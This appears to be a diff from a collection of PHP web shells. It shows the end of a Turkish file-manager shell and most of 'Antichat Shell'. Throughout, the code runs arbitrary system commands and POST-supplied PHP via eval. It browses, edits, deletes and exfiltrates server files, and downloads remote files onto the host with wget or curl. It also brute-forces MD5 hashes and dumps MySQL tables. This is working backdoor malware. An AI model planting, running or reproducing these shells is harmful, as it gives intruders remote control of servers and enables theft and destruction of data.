echo "<a href='./$this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path'><font color='#FFFF00'>$fileperm</font></a>";
|
||||
echo "<br></div>\n";
|
||||
}else{
|
||||
echo "<div align=left><a href='./$this_file?dir=$path/$file'>GÝT></a> <font face='arial' size='3' color='#808080'> $path/$file</font> - <b>DIR</b> - <a href='./$this_file?op=dd&yol=$path/$file&here=$path'>Sil</a> - ";
|
||||
$dirperm=substr(base_convert(fileperms("$path/$file"),10,8),-4);
|
||||
echo "<font color='#FFFF00'>$dirperm</font>";
|
||||
echo " <br></div>\n";
|
||||
|
||||
}
|
||||
}
|
||||
}
|
||||
closedir($dir);
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
echo "<center><a href='./$this_file?dir=$DOCUMENT_ROOT'>Root Klasörüne Git</a></center>";
|
||||
if(file_exists("B:\\")){
|
||||
echo "<center><a href='./$this_file?dir=B:\\'>B:\\</a></center>";
|
||||
} else {}
|
||||
if(file_exists("C:\\")){
|
||||
echo "<center><a href='./$this_file?dir=C:\\'>C:\\</a></center>";
|
||||
} else {}
|
||||
if (file_exists("D:\\")){
|
||||
echo "<center><a href='./$this_file?dir=D:\\'>D:\\</a></center>";
|
||||
} else {}
|
||||
if (file_exists("E:\\")){
|
||||
echo "<center><a href='./$this_file?dir=E:\\'>E:\\</a></center>";
|
||||
} else {}
|
||||
if (file_exists("F:\\")){
|
||||
echo "<center><a href='./$this_file?dir=F:\\'>F:\\</a></center>";
|
||||
} else {}
|
||||
if (file_exists("G:\\")){
|
||||
echo "<center><a href='./$this_file?dir=G:\\'>G:\\</a></center>";
|
||||
} else {}
|
||||
if (file_exists("H:\\")){
|
||||
echo "<center><a href='./$this_file?dir=H:\\'>H:\\</a></center>";
|
||||
} else {}
|
||||
|
||||
|
||||
echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
|
||||
echo "<center><font size='+1' color='#FF0000'><b>SERVER BÝLGÝLERÝ</b></font><br></center>";
|
||||
echo "<br><u><b>$SERVER_SIGNATURE</b></u>";
|
||||
echo "<b><u>Software</u>: $SERVER_SOFTWARE</b><br>";
|
||||
echo "<b><u>Server IP</u>: $SERVER_ADDR</b><br>";
|
||||
echo "<br>";
|
||||
echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
|
||||
echo "<center><font size='+1' color='#FF0000'><b>ÝÞLEMLER</b></font><br></center>";
|
||||
echo "<br><center><font size='4'><a href='$this_file?op=up&dir=$path'>Dosya Gönder</a></font></center>";
|
||||
echo "<br><center><font size='4'><a href='$this_file?op=mf&dir=$path'>Dosya Oluþtur</a></font></center>";
|
||||
echo "<br><center><font size='4'><a href='$this_file?op=md&dir=$path'>Klasör Oluþtur</a></font></center>";
|
||||
echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
|
||||
echo "<center>Tüm haklarý sahibi C-W-M'ye aittir</center><br>";
|
||||
?>
|
||||
|
||||
|
||||
|
||||
|
693
xakep-shells/PHP/a_gedit.php.php.txt
Normal file
693
xakep-shells/PHP/a_gedit.php.php.txt
Normal file
|
@ -0,0 +1,693 @@
|
|||
<?php
|
||||
session_start();
|
||||
error_reporting(E_ALL ^ E_NOTICE);
|
||||
$self=$HTTP_SERVER_VARS['PHP_SELF'];
|
||||
set_magic_quotes_runtime(0);
|
||||
@set_time_limit(0);
|
||||
if(@get_magic_quotes_gpc()){foreach ($_POST as $k=>$v){$_POST[$k] = stripslashes($v);}}
|
||||
@ini_set('max_execution_time',0);
|
||||
(@ini_get('safe_mode')=="1" ? $safe_mode="ON" : $safe_mode="OFF");
|
||||
(@ini_get('disable_functions')!="" ? $disfunc=ini_get('disable_functions') : $disfunc=0);
|
||||
(strtoupper(substr(PHP_OS, 0, 3))==='WIN' ? $os=1 : $os=0);
|
||||
$action=$_POST['action'];
|
||||
$file=$_POST['file'];
|
||||
$dir=$_POST['dir'];
|
||||
$content='';
|
||||
$stdata='';
|
||||
$style='<STYLE>BODY{background-color: #2b2f34;color: #9acd32;font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;MARGIN-TOP: 0px;MARGIN-BOTTOM: 0px;MARGIN-LEFT: 0px;MARGIN-RIGHT: 0px;margin:0;padding:0;scrollbar-face-color: #31333b;scrollbar-shadow-color: #363940;scrollbar-highlight-color: #363940;scrollbar-3dlight-color: #363940;scrollbar-darkshadow-color: #363940;scrollbar-track-color: #363940;scrollbar-arrow-color: #363940;}input{background-color: #31333b;font-size: 8pt;color: #b50016;font-family: Tahoma;border: 1 solid #666666;}select{background-color: #31333b;font-size: 8pt;color: #b50016;font-family: Tahoma;border: 1 solid #666666;}textarea{background-color: #363940;font-size: 8pt;color: #b50016;font-family: Tahoma;border: 1 solid #666666;}a:link{color: #91cd32;text-decoration: none;font-size: 8pt;}a:visited{color: #91cd32;text-decoration: none;font-size: 8pt;}a:hover, a:active{background-color: #A8A8AD;color: #E7E7EB;text-decoration: none;font-size: 8pt;}td, th, p, li{font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;border-color:black;}</style>';
|
||||
$header='<html><head><title>'.getenv("HTTP_HOST").' - Antichat Shell</title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251">'.$style.'</head><BODY leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>';
|
||||
$footer='</body></html>';
|
||||
$lang=array(
|
||||
'filext'=>'File already exists.',
|
||||
'uploadok'=>'File was successfully uploaded.',
|
||||
'dircrt'=>'Dir is created.',
|
||||
'dontlist'=>'Listing dir permission denide.',
|
||||
'dircrterr'=>'Don\'t create dir.',
|
||||
'dirnf'=>'Dir not found.',
|
||||
'filenf'=>'File not found.',
|
||||
'dontwrdir'=>'Only read current dir.',
|
||||
'empty'=>'Directory not empty or access denide.',
|
||||
'deletefileok'=>'File deleted.',
|
||||
'deletedirok'=>'Dir deleted.',
|
||||
'isdontfile'=>'Selected file this is link.',
|
||||
'cantrfile'=>'Cant read file, permission denide.',
|
||||
'onlyracc'=>'Don\'t edit, only read access.',
|
||||
'workdir'=>'Work directory: ',
|
||||
'fullacc'=>'Full access.',
|
||||
'fullaccdir'=>'Full accees you are can create and delete dir.',
|
||||
'thisnodir'=>'This is don\'t dir.',
|
||||
'allfuncsh'=>'All function for work shell was disabled.'
|
||||
);
|
||||
|
||||
$act=array('viewer','editor','upload','shell','phpeval','download','delete','deletedir','brute','mysql');//here added new actions
|
||||
|
||||
function test_file($file){
|
||||
if(!file_exists($file))$err="1";
|
||||
elseif(!is_file($file)) $err="2";
|
||||
elseif(!is_readable($file))$err="3";
|
||||
elseif(!is_writable($file))$err="4"; else $err="5";
|
||||
return $err;}
|
||||
|
||||
function test_dir($dir){
|
||||
if(!file_exists($dir))$err="1";
|
||||
elseif(!is_dir($dir)) $err="2";
|
||||
elseif(!is_readable($dir))$err="3";
|
||||
elseif(!is_writable($dir))$err="4"; else $err="5";
|
||||
return $err;}
|
||||
|
||||
function perms($file){
|
||||
$perms = fileperms($file);
|
||||
if (($perms & 0xC000) == 0xC000) {$info = 's';}
|
||||
elseif (($perms & 0xA000) == 0xA000) {$info = 'l';}
|
||||
elseif (($perms & 0x8000) == 0x8000) {$info = '-';}
|
||||
elseif (($perms & 0x6000) == 0x6000) {$info = 'b';}
|
||||
elseif (($perms & 0x4000) == 0x4000) {$info = 'd';}
|
||||
elseif (($perms & 0x2000) == 0x2000) {$info = 'c';}
|
||||
elseif (($perms & 0x1000) == 0x1000) {$info = 'p';}
|
||||
else {$info = 'u';}
|
||||
$info .= (($perms & 0x0100) ? 'r' : '-');
|
||||
$info .= (($perms & 0x0080) ? 'w' : '-');
|
||||
$info .= (($perms & 0x0040) ?(($perms & 0x0800) ? 's' : 'x' ) :(($perms & 0x0800) ? 'S' : '-'));
|
||||
$info .= (($perms & 0x0020) ? 'r' : '-');
|
||||
$info .= (($perms & 0x0010) ? 'w' : '-');
|
||||
$info .= (($perms & 0x0008) ?(($perms & 0x0400) ? 's' : 'x' ) :(($perms & 0x0400) ? 'S' : '-'));
|
||||
$info .= (($perms & 0x0004) ? 'r' : '-');
|
||||
$info .= (($perms & 0x0002) ? 'w' : '-');
|
||||
$info .= (($perms & 0x0001) ?(($perms & 0x0200) ? 't' : 'x' ) :(($perms & 0x0200) ? 'T' : '-'));
|
||||
return $info;}
|
||||
|
||||
function view_size($size){
|
||||
if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
|
||||
elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
|
||||
elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
|
||||
else {$size = $size . " B";}
|
||||
return $size;}
|
||||
|
||||
if(isset($action)){if(!in_array($action,$act))$action="viewer";else $action=$action;}else $action="viewer";
|
||||
|
||||
if(isset($dir)){
|
||||
$ts['test']=test_dir($dir);
|
||||
switch($ts['test']){
|
||||
case 1:$stdata.=$lang['dirnf'];break;
|
||||
case 2:$stdata.=$lang['thisnodir'];break;
|
||||
case 3:$stdata.=$lang['dontlist'];break;
|
||||
case 4:$stdata.=$lang['dontwrdir'];$dir=chdir($GLOBALS['dir']);break;
|
||||
case 5:$stdata.=$lang['fullaccdir'];$dir=chdir($GLOBALS['dir']);break;}
|
||||
}else $dir=@chdir($dir);
|
||||
|
||||
$dir=getcwd()."/";
|
||||
$dir=str_replace("\\","/",$dir);
|
||||
|
||||
if(isset($file)){
|
||||
$ts['test1']=test_file($file);
|
||||
switch ($ts['test1']){
|
||||
case 1:$stdata.=$lang['filenf'];break;
|
||||
case 2:$stdata.=$lang['isdontfile'];break;
|
||||
case 3:$stdata.=$lang['cantrfile'];break;
|
||||
case 4:$stdata.=$lang['onlyracc'];$file=$file;break;
|
||||
case 5:$stdata.=$lang['fullacc'];$file=$file;break;}
|
||||
}
|
||||
|
||||
function shell($cmd)
|
||||
{
|
||||
global $lang;
|
||||
$ret = '';
|
||||
if (!empty($cmd))
|
||||
{
|
||||
if(function_exists('exec')){@exec($cmd,$ret);$ret = join("\n",$ret);}
|
||||
elseif(function_exists('shell_exec')){$ret = @shell_exec($cmd);}
|
||||
elseif(function_exists('system')){@ob_start();@system($cmd);$ret = @ob_get_contents();@ob_end_clean();}
|
||||
elseif(function_exists('passthru')){@ob_start();@passthru($cmd);$ret = @ob_get_contents();@ob_end_clean();}
|
||||
elseif(@is_resource($f = @popen($cmd,"r"))){$ret = "";while(!@feof($f)) { $ret .= @fread($f,1024); }@pclose($f);}
|
||||
else $ret=$lang['allfuncsh'];
|
||||
}
|
||||
return $ret;
|
||||
}
|
||||
|
||||
function createdir($dir){mkdir($dir);}
|
||||
|
||||
//delete file
|
||||
if($action=="delete"){
|
||||
if(unlink($file)) $content.=$lang['deletefileok']."<a href=\"#\" onclick=\"document.reqs.action.value='viewer';document.reqs.dir.value='".$dir."'; document.reqs.submit();\"> Click here for back in viewer</a>";
|
||||
}
|
||||
//delete dir
|
||||
if($action=="deletedir"){
|
||||
if(!rmdir($file)) $content.=$lang['empty']."<a href=\"#\" onclick=\"document.reqs.action.value='viewer';document.reqs.dir.value='".$dir."'; document.reqs.submit();\"> Click here for back in viewer</a>";
|
||||
else $content.=$lang['deletedirok']."<a href=\"#\" onclick=\"document.reqs.action.value='viewer';document.reqs.dir.value='".$dir."'; document.reqs.submit();\"> Click here for back in viewer</a>";
|
||||
}
|
||||
//shell
|
||||
if($action=="shell"){
|
||||
$content.="<form method=\"POST\">
|
||||
<input type=\"hidden\" name=\"action\" value=\"shell\">
|
||||
<textarea name=\"command\" rows=\"5\" cols=\"150\">".@$_POST['command']."</textarea><br>
|
||||
<textarea readonly rows=\"15\" cols=\"150\">".convert_cyr_string(htmlspecialchars(shell($_POST['command'])),"d","w")."</textarea><br>
|
||||
<input type=\"submit\" value=\"execute\"></form>";}
|
||||
//editor
|
||||
if($action=="editor"){
|
||||
$stdata.="<tr><td><form method=POST>
|
||||
<input type=\"hidden\" name=\"action\" value=\"editor\">
|
||||
<input type=\"hidden\" name=\"dir\" value=\"".$dir."\">
|
||||
Open file:<input type=text name=file value=\"".($file=="" ? $file=$dir : $file=$file)."\" size=50><input type=submit value=\">>\"></form>";
|
||||
function writef($file,$data){
|
||||
$fp = fopen($file,"w+");
|
||||
fwrite($fp,$data);
|
||||
fclose($fp);
|
||||
}
|
||||
function readf($file){
|
||||
clearstatcache();
|
||||
$f=fopen($file, "r");
|
||||
$contents = fread($f,filesize($file));
|
||||
fclose($f);
|
||||
return htmlspecialchars($contents);
|
||||
}
|
||||
if(@$_POST['save'])writef($file,$_POST['data']);
|
||||
if(@$_POST['create'])writef($file,"");
|
||||
$test=test_file($file);
|
||||
if($test==1){
|
||||
$content.="<form method=\"POST\">
|
||||
<input type=\"hidden\" name=\"action\" value=\"editor\">
|
||||
File name:<input type=\"text\" name=\"file\" value=\"".$file."\" size=\"50\"><br>
|
||||
<input type=\"submit\" name=\"create\" value=\"Create new file with this name?\">
|
||||
<input type=\"reset\" value=\"No\"></form>";
|
||||
}
|
||||
if($test>2){
|
||||
$content.="<form method=\"POST\">
|
||||
<input type=\"hidden\" name=\"action\" value=\"editor\">
|
||||
<input type=\"hidden\" name=\"file\" value=\"".$file."\">
|
||||
<textarea name=\"data\" rows=\"30\" cols=\"180\">".@readf($file)."</textarea><br>
|
||||
<input type=\"submit\" name=\"save\" value=\"save\"><input type=\"reset\" value=\"reset\"></form>";
|
||||
}}
|
||||
//viewer
|
||||
if($action=="viewer"){
|
||||
$content.="<table cellSpacing=0 border=2 style=\"border-color:black;\" cellPadding=0 width=\"100%\">";
|
||||
$content.="<tr><td><form method=POST><br>Open directory: <input type=text name=dir value=\"".$dir."\" size=50><input type=submit value=\">>\"></form>";
|
||||
if (is_dir($dir)) {
|
||||
if (@$dh = opendir($dir)) {
|
||||
while (($file = readdir($dh)) !== false) {
|
||||
if(filetype($dir . $file)=="dir") $dire[]=$file;
|
||||
if(filetype($dir . $file)=="file")$files[]=$file;
|
||||
}
|
||||
closedir($dh);
|
||||
@sort($dire);
|
||||
@sort($files);
|
||||
if ($GLOBALS['os']==1) {
|
||||
$content.="<tr><td>Select drive:";
|
||||
for ($j=ord('C'); $j<=ord('Z'); $j++)
|
||||
if (@$dh = opendir(chr($j).":/"))
|
||||
$content.='<a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.chr($j).':/\'; document.reqs.submit();"> '.chr($j).'<a/>';
|
||||
$content.="</td></tr>";
|
||||
}
|
||||
$content.="<tr><td>Name dirs and files</td><td>type</td><td>size</td><td>permission</td><td>options</td></tr>";
|
||||
for($i=0;$i<count($dire);$i++) {
|
||||
$link=$dir.$dire[$i];
|
||||
$content.='<tr><td><a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.$link.'\'; document.reqs.submit();">'.$dire[$i].'<a/></td><td>dir</td><td></td><td>'.perms($link).'</td><td><a href="#" onclick="document.reqs.action.value=\'deletedir\'; document.reqs.file.value=\''.$link.'\'; document.reqs.submit();" title="Delete this file">X</a></td></tr>';
|
||||
}
|
||||
for($i=0;$i<count($files);$i++) {
|
||||
$linkfile=$dir.$files[$i];
|
||||
$content.='<tr><td><a href="#" onclick="document.reqs.action.value=\'editor\';document.reqs.dir.value=\''.$dir.'\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();">'.$files[$i].'</a><br></td><td>file</td><td>'.view_size(filesize($linkfile)).'</td><td>'.perms($linkfile).'</td><td><a href="#" onclick="document.reqs.action.value=\'download\'; document.reqs.file.value=\''.$linkfile.'\';document.reqs.dir.value=\''.$dir.'\'; document.reqs.submit();" title="Download">D</a><a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\''.$linkfile.'\';document.reqs.dir.value=\''.$dir.'\'; document.reqs.submit();" title="Edit">E</a><a href="#" onclick="document.reqs.action.value=\'delete\'; document.reqs.file.value=\''.$linkfile.'\';document.reqs.dir.value=\''.$dir.'\'; document.reqs.submit();" title="Delete this file">X</a></td></tr>';
|
||||
}
|
||||
$content.="</table>";
|
||||
}}}
|
||||
//downloader
|
||||
if($action=="download"){
|
||||
header('Content-Length:'.filesize($file).'');
|
||||
header('Content-Type: application/octet-stream');
|
||||
header('Content-Disposition: attachment; filename="'.$file.'"');
|
||||
readfile($file);}
|
||||
//phpeval
|
||||
if($action=="phpeval"){
|
||||
$content.="<form method=\"POST\">
|
||||
<input type=\"hidden\" name=\"action\" value=\"phpeval\">
|
||||
<input type=\"hidden\" name=\"dir\" value=\"".$dir."\">
|
||||
<?php<br>
|
||||
<textarea name=\"phpev\" rows=\"5\" cols=\"150\">".@$_POST['phpev']."</textarea><br>
|
||||
?><br>
|
||||
<input type=\"submit\" value=\"execute\"></form>";
|
||||
if(isset($_POST['phpev']))$content.=eval($_POST['phpev']);}
|
||||
//upload
|
||||
if($action=="upload"){
|
||||
if(isset($_POST['dirupload'])) $dirupload=$_POST['dirupload'];else $dirupload=$dir;
|
||||
$form_win="<table><form method=POST enctype=multipart/form-data>
|
||||
<tr><td><input type=\"hidden\" name=\"action\" value=\"upload\">
|
||||
Upload to dir: <input type=text name=dirupload value=\"".$dirupload."\" size=50><tr><td>New file name: <input type=text name=filename></td></tr><tr><td><input type=file name=file> <input type=submit name=uploadloc value='Upload local file'></td></tr>";
|
||||
if($os==1)$content.=$form_win;
|
||||
if($os==0){
|
||||
$content.=$form_win;
|
||||
$content.='<tr><td><select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>File addres:<input type=text name=urldown>
|
||||
<input type=submit name=upload value=Upload></form></td></tr>';
|
||||
}
|
||||
|
||||
if(isset($_POST['uploadloc'])){
|
||||
if(!isset($_POST['filename'])) $uploadfile = $dirupload.basename($_FILES['file']['name']); else
|
||||
$uploadfile = $dirupload."/".$_POST['filename'];
|
||||
|
||||
if(test_dir($dirupload)==1 && test_dir($dir)!=3 && test_dir($dir)!=4){createdir($dirupload);}
|
||||
if(file_exists($uploadfile))$content.=$lang['filext'];
|
||||
elseif (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile))
|
||||
$content.=$lang['uploadok'];
|
||||
}
|
||||
|
||||
if(isset($_POST['upload'])){
|
||||
if (!empty($_POST['with']) && !empty($_POST['urldown']) && !empty($_POST['filename']))
|
||||
switch($_POST['with'])
|
||||
{
|
||||
case wget:shell(which('wget')." ".$_POST['urldown']." -O ".$_POST['filename']."");break;
|
||||
case fetch:shell(which('fetch')." -o ".$_POST['filename']." -p ".$_POST['urldown']."");break;
|
||||
case lynx:shell(which('lynx')." -source ".$_POST['urldown']." > ".$_POST['filename']."");break;
|
||||
case links:shell(which('links')." -source ".$_POST['urldown']." > ".$_POST['filename']."");break;
|
||||
case GET:shell(which('GET')." ".$_POST['urldown']." > ".$_POST['filename']."");break;
|
||||
case curl:shell(which('curl')." ".$_POST['urldown']." -o ".$_POST['filename']."");break;
|
||||
}}}
|
||||
//Brute
|
||||
if($action=="brute"){
|
||||
|
||||
function Brute() {
|
||||
global $action,$pass_de,$chars_de,$dat,$date;
|
||||
ignore_user_abort(1);
|
||||
}
|
||||
if($chars_de==""){$chars_de="";}
|
||||
$content="<table><form action='$php_self' method=post name=md5><tr><td><b>Decrypte MD5</b>
|
||||
<tr><td> MD5 õåø:<b>".$pass_de."</b></td>
|
||||
<input type='hidden' name='action' value='$action'>
|
||||
<tr><td> <textarea class='inputbox' name='chars_de' cols='50' rows='5'>".$chars_de."</textarea></td>
|
||||
<td><b>Ïåðåáîð áóêâ:</b><br><font color=red><b><u>ENG:</u></b></font>
|
||||
<a class=menu href=javascript:ins('abcdefghijklmnopqrstuvwxyz')>[a-z]</a>
|
||||
<a class=menu href=javascript:ins('ABCDEFGHIJKLMNOPQRSTUVWXYZ')>[A-Z]</a><br>
|
||||
<a class=menu href=javascript:ins('0123456789')>[0-9]</a>
|
||||
<a class=menu href=javascript:ins('~`\!@#$%^&*()-_+=|/?><[]{}:¹.,"')>[Ñèìâîëû]</a><br><br>
|
||||
<font color=red><b><u>RUS:</u></b></font>
|
||||
<a class=menu href=javascript:ins('àáâãäå¸æçèéêëìíîïðñòóôõö÷øùúûüýþÿ')>[à-ÿ]</a>
|
||||
<a class=menu href=javascript:ins('ÀÁÂÃÄŨÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞß')>[À-ß]</a>
|
||||
<br></br><input type=reset value=Î÷èñòèòü class=button1></td></tr>
|
||||
<tr><td> <input class='inputbox' type='text' name='pass_de' size=50 onclick=this.value=''>
|
||||
</td><td><input type='submit' value='Decrypt MD5' class=button1></td></tr></form>
|
||||
<script>
|
||||
function ins(text){
|
||||
document.md5.chars_de.value+=text;
|
||||
document.md5.chars_de.focus();}
|
||||
</script>";
|
||||
|
||||
if($_POST[pass_de]){
|
||||
$pass_de=htmlspecialchars($pass_de);
|
||||
$pass_de=stripslashes($pass_de);
|
||||
$dat=date("H:i:s");
|
||||
$date=date("d:m:Y");
|
||||
}
|
||||
{
|
||||
crack_md5();
|
||||
}
|
||||
}
|
||||
function crack_md5() {
|
||||
global $chars_de;
|
||||
$chars=$_POST[chars];
|
||||
set_time_limit(0);
|
||||
ignore_user_abort(1);
|
||||
$chars_de=str_replace("<",chr(60),$chars_de);
|
||||
$chars_de=str_replace(">",chr(62),$chars_de);
|
||||
$c=strlen($chars_de);
|
||||
for ($next = 0; $next <= 31; $next++) {
|
||||
for ($i1 = 0; $i1 <= $c; $i1++) {
|
||||
$word[1] = $chars_de{$i1};
|
||||
for ($i2 = 0; $i2 <= $c; $i2++) {
|
||||
$word[2] = $chars_de{$i2};
|
||||
if ($next <= 2) {
|
||||
result(implode($word));
|
||||
}else {
|
||||
for ($i3 = 0; $i3 <= $c; $i3++) {
|
||||
$word[3] = $chars_de{$i3};
|
||||
if ($next <= 3) {
|
||||
result(implode($word));
|
||||
}else {
|
||||
for ($i4 = 0; $i4 <= $c; $i4++) {
|
||||
$word[4] = $chars_de{$i4};
|
||||
if ($next <= 4) {
|
||||
result(implode($word));
|
||||
}else {
|
||||
for ($i5 = 0; $i5 <= $c; $i5++) {
|
||||
$word[5] = $chars_de{$i5};
|
||||
if ($next <= 5) {
|
||||
result(implode($word));
|
||||
}else {
|
||||
for ($i6 = 0; $i6 <= $c; $i6++) {
|
||||
$word[6] = $chars_de{$i6};
|
||||
if ($next <= 6) {
|
||||
result(implode($word));
|
||||
}else {
|
||||
for ($i7 = 0; $i7 <= $c; $i7++) {
|
||||
$word[7] = $chars_de{$i7};
|
||||
if ($next <= 7) {
|
||||
result(implode($word));
|
||||
}else {
|
||||
for ($i8 = 0; $i8 <= $c; $i8++) {
|
||||
$word[8] = $chars_de{$i8};
|
||||
if ($next <= 8) {
|
||||
result(implode($word));
|
||||
}else {
|
||||
for ($i9 = 0; $i9 <= $c; $i9++) {
|
||||
$word[9] = $chars_de{$i9};
|
||||
if ($next <= 9) {
|
||||
result(implode($word));
|
||||
}else {
|
||||
for ($i10 = 0; $i10 <= $c; $i10++) {
|
||||
$word[10] = $chars_de{$i10};
|
||||
if ($next <= 10) {
|
||||
result(implode($word));
|
||||
}else {
|
||||
for ($i11 = 0; $i11 <= $c; $i11++) {
|
||||
$word[11] = $chars_de{$i11};
|
||||
if ($next <= 11) {
|
||||
result(implode($word));
|
||||
}else {
|
||||
for ($i12 = 0; $i12 <= $c; $i12++) {
|
||||
$word[12] = $chars_de{$i12};
|
||||
if ($next <= 12) {
|
||||
result(implode($word));
|
||||
}else {
|
||||
for ($i13 = 0; $i13 <= $c; $i13++) {
|
||||
$word[13] = $chars_de{$i13};
|
||||
if ($next <= 13) {
|
||||
result(implode($word));
|
||||
}else {
|
||||
for ($i14 = 0; $i14 <= $c; $i14++) {
|
||||
$word[14] = $chars_de{$i14};
|
||||
if ($next <= 14) {
|
||||
result(implode($word));
|
||||
}else {
|
||||
for ($i15 = 0; $i15 <= $c; $i15++) {
|
||||
$word[15] = $chars_de{$i15};
|
||||
if ($next <= 15) {
|
||||
result(implode($word));
|
||||
}else {
|
||||
for ($i16 = 0; $i16 <= $c; $i16++) {
|
||||
$word[16] = $chars_de{$i16};
|
||||
if ($next <= 16) {
|
||||
result(implode($word));
|
||||
}else {
|
||||
for ($i17 = 0; $i17 <= $c; $i17++) {
|
||||
$word[17] = $chars_de{$i17};
|
||||
if ($next <= 17) {
|
||||
result(implode($word));
|
||||
}else {
|
||||
for ($i18 = 0; $i18 <= $c; $i18++) {
|
||||
$word[18] = $chars_de{$i18};
|
||||
if ($next <= 18) {
|
||||
result(implode($word));
|
||||
}else {
|
||||
for ($i19 = 0; $i19 <= $c; $i19++) {
|
||||
$word[19] = $chars_de{$i19};
|
||||
if ($next <= 19) {
|
||||
result(implode($word));
|
||||
}else {
|
||||
for ($i20 = 0; $i20 <= $c; $i20++) {
|
||||
$word[20] = $chars_de{$i20};
|
||||
if ($next <= 20) {
|
||||
result(implode($word));
|
||||
}else {
|
||||
for ($i21 = 0; $i21 <= $c; $i21++) {
|
||||
$word[21] = $chars_de{$i21};
|
||||
if ($next <= 21) {
|
||||
result(implode($word));
|
||||
}else {
|
||||
for ($i22 = 0; $i22 <= $c; $i22++) {
|
||||
$word[22] = $chars_de{$i22};
|
||||
if ($next <= 22) {
|
||||
result(implode($word));
|
||||
}else {
|
||||
for ($i23 = 0; $i23 <= $c; $i23++) {
|
||||
$word[23] = $chars_de{$i23};
|
||||
if ($next <= 23) {
|
||||
result(implode($word));
|
||||
}else {
|
||||
for ($i24 = 0; $i24 <= $c; $i24++) {
|
||||
$word[24] = $chars_de{$i24};
|
||||
if ($next <= 24) {
|
||||
result(implode($word));
|
||||
}else {
|
||||
for ($i25 = 0; $i25 <= $c; $i25++) {
|
||||
$word[25] = $chars_de{$i25};
|
||||
if ($next <= 25) {
|
||||
result(implode($word));
|
||||
}else {
|
||||
for ($i26 = 0; $i26 <= $c; $i26++) {
|
||||
$word[26] = $chars_de{$i26};
|
||||
if ($next <= 26) {
|
||||
result(implode($word));
|
||||
}else {
|
||||
for ($i27 = 0; $i27 <= $c; $i27++) {
|
||||
$word[27] = $chars_de{$i27};
|
||||
if ($next <= 27) {
|
||||
result(implode($word));
|
||||
}else {
|
||||
for ($i28 = 0; $i28 <= $c; $i28++) {
|
||||
$word[28] = $chars_de{$i28};
|
||||
if ($next <= 28) {
|
||||
result(implode($word));
|
||||
}else {
|
||||
for ($i29 = 0; $i29 <= $c; $i29++) {
|
||||
$word[29] = $chars_de{$i29};
|
||||
if ($next <= 29) {
|
||||
result(implode($word));
|
||||
}else {
|
||||
for ($i30 = 0; $i30 <= $c; $i30++) {
|
||||
$word[30] = $chars_de{$i30};
|
||||
if ($next <= 30) {
|
||||
result(implode($word));
|
||||
}else {
|
||||
for ($i31 = 0; $i31 <= $c; $i31++) {
|
||||
$word[31] = $chars_de{$i31};
|
||||
if ($next <= 31) {
|
||||
result(implode($word));
|
||||
}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}
|
||||
|
||||
function result($word) {
|
||||
global $dat,$date;
|
||||
$pass_de=$_POST[pass_de];
|
||||
$dat2=date("H:i:s");
|
||||
$date2=date("d:m:Y");
|
||||
|
||||
if(md5($word)==$pass_de){
|
||||
|
||||
|
||||
|
||||
echo "<STYLE>BODY{background-color: #2b2f34;color: #9acd32;</STYLE><table><tr><td>Ðåçóëüòàò âûïîëíåíèÿ ïåðåáîðà ïàðîëåé:</td></tr>
|
||||
<tr><td>Çàõåøèðîâàííûé ïàðîëü:</b></td><td><font color=red> $word</font></td></tr>
|
||||
<tr><td>Íà÷àëî ïåðåáîðà:</td><td> $dat - $date</td></tr>
|
||||
<tr><td>Îêîí÷àíèå ïåðåáîðà:</td><td> $dat2 - $date2</td></tr>
|
||||
<tr><td>Âûïîëíåíèå ïåðåáîðà õåøåé çàïèñàí â ôàéë: ".$word."_md5</td></tr></table>";
|
||||
|
||||
|
||||
|
||||
$f=@fopen($word._md5,"a+");
|
||||
fputs($f,"Õýø èç MD5 [$pass_de] = $word
|
||||
Íà÷àëî ïåðåáîðà:\t$dat - $date
|
||||
Îêîí÷àíèå ïåðåáîðà:\t$dat2 - $date2");
|
||||
exit;
|
||||
}}
|
||||
|
||||
//Mysql
|
||||
|
||||
if($action=="mysql"){
|
||||
if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
|
||||
if((!empty($_POST['dif'])&&$fp)||(empty($_POST['dif']))){
|
||||
$db = @mysql_connect('localhost',$_POST['mysql_l'],$_POST['mysql_p']);
|
||||
if($db)
|
||||
{
|
||||
if(@mysql_select_db($_POST['mysql_db'],$db))
|
||||
{
|
||||
$sql1 .= "# ---------------------------------\r\n";
|
||||
$sql1 .= "# date : ".date ("j F Y g:i")."\r\n";
|
||||
$sql1 .= "# database : ".$_POST['mysql_db']."\r\n";
|
||||
$sql1 .= "# table : ".$_POST['mysql_tbl']."\r\n";
|
||||
$sql1 .= "# ---------------------------------\r\n\r\n";
|
||||
|
||||
$res = @mysql_query("SHOW CREATE TABLE `".$_POST['mysql_tbl']."`", $db);
|
||||
$row = @mysql_fetch_row($res);
|
||||
$sql1 .= $row[1]."\r\n\r\n";
|
||||
$sql1 .= "# ---------------------------------\r\n\r\n";
|
||||
|
||||
$sql2 = '';
|
||||
|
||||
$res = @mysql_query("SELECT * FROM `".$_POST['mysql_tbl']."`", $db);
|
||||
if (@mysql_num_rows($res) > 0) {
|
||||
